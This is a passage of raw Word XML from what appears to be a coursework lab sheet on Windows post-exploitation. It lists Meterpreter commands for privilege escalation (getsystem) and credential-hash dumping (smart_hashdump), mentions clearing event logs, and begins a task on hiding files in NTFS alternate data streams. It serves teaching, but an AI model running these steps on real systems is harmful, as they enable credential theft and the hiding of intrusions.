                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="9084,552;0,552;0,828;9084,828;9084,552;9084,0;0,0;0,276;0,552;9084,552;9084,276;9084,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF38A5C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="238" w:lineRule="exact"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; getsystem –t 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FD692" w14:textId="4B214945" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="811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0F30A183" wp14:editId="1DFE9831">
                <wp:extent cx="5768340" cy="525780"/>
                <wp:effectExtent l="635" t="0" r="3175" b="0"/>
                <wp:docPr id="40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8340" cy="525780"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9084" cy="828"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="41" name="Freeform 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084" cy="828"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T1" fmla="*/ 0 h 828"/>
                              <a:gd name="T2" fmla="*/ 0 w 9084"/>
                              <a:gd name="T3" fmla="*/ 0 h 828"/>
                              <a:gd name="T4" fmla="*/ 0 w 9084"/>
                              <a:gd name="T5" fmla="*/ 276 h 828"/>
                              <a:gd name="T6" fmla="*/ 0 w 9084"/>
                              <a:gd name="T7" fmla="*/ 552 h 828"/>
                              <a:gd name="T8" fmla="*/ 0 w 9084"/>
                              <a:gd name="T9" fmla="*/ 828 h 828"/>
                              <a:gd name="T10" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T11" fmla="*/ 828 h 828"/>
                              <a:gd name="T12" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T13" fmla="*/ 552 h 828"/>
                              <a:gd name="T14" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T15" fmla="*/ 276 h 828"/>
                              <a:gd name="T16" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T17" fmla="*/ 0 h 8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9084" h="828">
                                <a:moveTo>
                                  <a:pt x="90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6"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="276"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90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F2F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038D6E" id="Group 17" o:spid="_x0000_s1026" style="width:454.2pt;height:41.4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="9084,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">
                <v:shape id="Freeform 18" o:spid="_x0000_s1027" style="position:absolute;width:9084;height:828;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9084,8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" path="m9084,l,,,276,,552,,828r9084,l9084,552r,-276l9084,xe" fillcolor="#f2f2f2" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="9084,0;0,0;0,276;0,552;0,828;9084,828;9084,552;9084,276;9084,0" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A76F24" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="237" w:lineRule="exact"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">meterpreter &gt; </w:t>
      </w:r>
      <w:r>
        <w:t>run post/windows/gather/smart_hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495F7239" w14:textId="2CD553CA" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="811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33BCFBC4" wp14:editId="3BFE7B84">
                <wp:extent cx="5768340" cy="525780"/>
                <wp:effectExtent l="635" t="0" r="3175" b="0"/>
                <wp:docPr id="38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8340" cy="525780"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9084" cy="828"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="39" name="AutoShape 1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084" cy="828"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T1" fmla="*/ 276 h 828"/>
                              <a:gd name="T2" fmla="*/ 0 w 9084"/>
                              <a:gd name="T3" fmla="*/ 276 h 828"/>
                              <a:gd name="T4" fmla="*/ 0 w 9084"/>
                              <a:gd name="T5" fmla="*/ 552 h 828"/>
                              <a:gd name="T6" fmla="*/ 0 w 9084"/>
                              <a:gd name="T7" fmla="*/ 828 h 828"/>
                              <a:gd name="T8" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T9" fmla="*/ 828 h 828"/>
                              <a:gd name="T10" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T11" fmla="*/ 552 h 828"/>
                              <a:gd name="T12" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T13" fmla="*/ 276 h 828"/>
                              <a:gd name="T14" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T15" fmla="*/ 0 h 828"/>
                              <a:gd name="T16" fmla="*/ 0 w 9084"/>
                              <a:gd name="T17" fmla="*/ 0 h 828"/>
                              <a:gd name="T18" fmla="*/ 0 w 9084"/>
                              <a:gd name="T19" fmla="*/ 276 h 828"/>
                              <a:gd name="T20" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T21" fmla="*/ 276 h 828"/>
                              <a:gd name="T22" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T23" fmla="*/ 0 h 8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9084" h="828">
                                <a:moveTo>
                                  <a:pt x="9084" y="276"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="276"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="276"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="90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6"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="276"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90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F2F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3ED43BA" id="Group 15" o:spid="_x0000_s1026" style="width:454.2pt;height:41.4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="9084,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">
                <v:shape id="AutoShape 16" o:spid="_x0000_s1027" style="position:absolute;width:9084;height:828;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9084,8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" path="m9084,276l,276,,552,,828r9084,l9084,552r,-276xm9084,l,,,276r9084,l9084,xe" fillcolor="#f2f2f2" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="9084,276;0,276;0,552;0,828;9084,828;9084,552;9084,276;9084,0;0,0;0,276;9084,276;9084,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DADCCBF" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="237" w:lineRule="exact"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>Finally, command to clear the event logs…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F94A5A3" w14:textId="5825AA2F" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="811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24D95EB5" wp14:editId="5FBC5C16">
                <wp:extent cx="5768340" cy="525780"/>
                <wp:effectExtent l="635" t="0" r="3175" b="0"/>
                <wp:docPr id="36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8340" cy="525780"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9084" cy="828"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="37" name="AutoShape 1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084" cy="828"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T1" fmla="*/ 552 h 828"/>
                              <a:gd name="T2" fmla="*/ 0 w 9084"/>
                              <a:gd name="T3" fmla="*/ 552 h 828"/>
                              <a:gd name="T4" fmla="*/ 0 w 9084"/>
                              <a:gd name="T5" fmla="*/ 828 h 828"/>
                              <a:gd name="T6" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T7" fmla="*/ 828 h 828"/>
                              <a:gd name="T8" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T9" fmla="*/ 552 h 828"/>
                              <a:gd name="T10" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T11" fmla="*/ 0 h 828"/>
                              <a:gd name="T12" fmla="*/ 0 w 9084"/>
                              <a:gd name="T13" fmla="*/ 0 h 828"/>
                              <a:gd name="T14" fmla="*/ 0 w 9084"/>
                              <a:gd name="T15" fmla="*/ 276 h 828"/>
                              <a:gd name="T16" fmla="*/ 0 w 9084"/>
                              <a:gd name="T17" fmla="*/ 552 h 828"/>
                              <a:gd name="T18" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T19" fmla="*/ 552 h 828"/>
                              <a:gd name="T20" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T21" fmla="*/ 276 h 828"/>
                              <a:gd name="T22" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T23" fmla="*/ 0 h 8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9084" h="828">
                                <a:moveTo>
                                  <a:pt x="9084" y="552"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="552"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="90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6"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="276"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90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F2F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3976CE5" id="Group 13" o:spid="_x0000_s1026" style="width:454.2pt;height:41.4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="9084,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">
                <v:shape id="AutoShape 14" o:spid="_x0000_s1027" style="position:absolute;width:9084;height:828;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9084,8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" path="m9084,552l,552,,828r9084,l9084,552xm9084,l,,,276,,552r9084,l9084,276,9084,xe" fillcolor="#f2f2f2" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="9084,552;0,552;0,828;9084,828;9084,552;9084,0;0,0;0,276;0,552;9084,552;9084,276;9084,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A32792" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="008B5358">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4231DF36" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="82"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3: Hide into file stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4CE5EC" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371D5744" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA99EF2" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="1559" w:right="1433"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Download</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>evaluation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>for 180</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3543A28D" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Makesure, you install it as a Desktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBFBFC7" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login to your Windows 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D3D37" w14:textId="425230D3" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:hanging="361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3440" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71626AE4" wp14:editId="22E18FB1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>324485</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5486400" cy="1329055"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="3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0" cy="132905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0D4239" w14:textId="0D298C8B" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:spacing w:before="4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Record your EVIDENCE</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0E015C2F" w14:textId="74497DA0" w:rsidR="00246F7D" w:rsidRDefault="00246F7D">
                            <w:pPr>
                              <w:spacing w:before="4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Won’t let me install the server kept saying: </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="42656AE5" w14:textId="0C77C5D6" w:rsidR="00246F7D" w:rsidRDefault="00246F7D">
                            <w:pPr>
                              <w:spacing w:before="4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9ED60B5" wp14:editId="1F611129">
                                  <wp:extent cx="3301782" cy="1009816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77785" cy="103306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626AE4" id="Text Box 12" o:spid="_x0000_s1041" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:1in;margin-top:25.55pt;width:6in;height:104.65pt;z-index:-157030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" fillcolor="#f2f2f2" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="510D4239" w14:textId="0D298C8B" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:spacing w:before="4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Record your EVIDENCE</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0E015C2F" w14:textId="74497DA0" w:rsidR="00246F7D" w:rsidRDefault="00246F7D">
                      <w:pPr>
                        <w:spacing w:before="4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 xml:space="preserve">Won’t let me install the server kept saying: </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="42656AE5" w14:textId="0C77C5D6" w:rsidR="00246F7D" w:rsidRDefault="00246F7D">
                      <w:pPr>
                        <w:spacing w:before="4"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="2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9ED60B5" wp14:editId="1F611129">
                            <wp:extent cx="3301782" cy="1009816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377785" cy="103306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280B8F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Check if your drive is</w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>NTFS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B922DA3" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="103"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Create a folder in C Drive (Eg:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Fdr_Hide).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EDAB11" w14:textId="3A8989D3" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:right="1436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4464" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CEF4220" wp14:editId="6307BA78">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>895985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1165860</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5768340" cy="1050290"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="3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8340" cy="105029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93D31A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:ind w:left="28" w:right="23"/>
                              <w:jc w:val="both"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Alternatively, you could write your own exe application and paste it in the folder. To create</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-20"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:t>.exe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application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t>or</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-18"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:t>any</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-20"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:t>executables,</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-20"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:t>use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t>any</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-20"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:t>development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t>platform.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t>(.Net,</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-19"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:t>Java, Python Scripts…)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3E1650A1" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:spacing w:before="7"/>
                              <w:rPr>
                                <w:sz w:val="23"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="79201590" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both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</w:rPr>
                              <w:t>Try</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"/>
                                <w:spacing w:val="-1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</w:rPr>
                              <w:t>them</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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0000"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</w:rPr>
                              <w:t>record</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>them</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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FF0000"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pacing w:val="-3"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>your</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>coursework</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>and/or</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"/>
                                <w:spacing w:val="-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FF0000"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FF0000"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</w:rPr>
                              <w:t>shared</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>Onenote</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"/>
                                <w:spacing w:val="-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</w:rPr>
                              <w:t>with instructions to gain</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF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</w:rPr>
                              <w:t>CREDITS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EF4220" id="Text Box 10" o:spid="_x0000_s1042" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:70.55pt;margin-top:91.8pt;width:454.2pt;height:82.7pt;z-index:-157020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" fillcolor="#f2f2f2" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2C93D31A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:ind w:left="28" w:right="23"/>
                        <w:jc w:val="both"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Alternatively, you could write your own exe application and paste it in the folder. To create</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-20"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:t>.exe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application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t>or</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-18"/>
                        </w:rPr>
